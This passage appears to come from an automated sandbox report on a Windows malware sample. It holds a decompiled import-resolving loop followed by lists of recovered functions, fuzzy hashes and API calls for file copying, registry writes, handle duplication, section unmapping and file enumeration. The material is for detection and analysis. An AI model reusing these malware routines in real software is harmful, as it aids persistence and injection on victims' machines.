							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
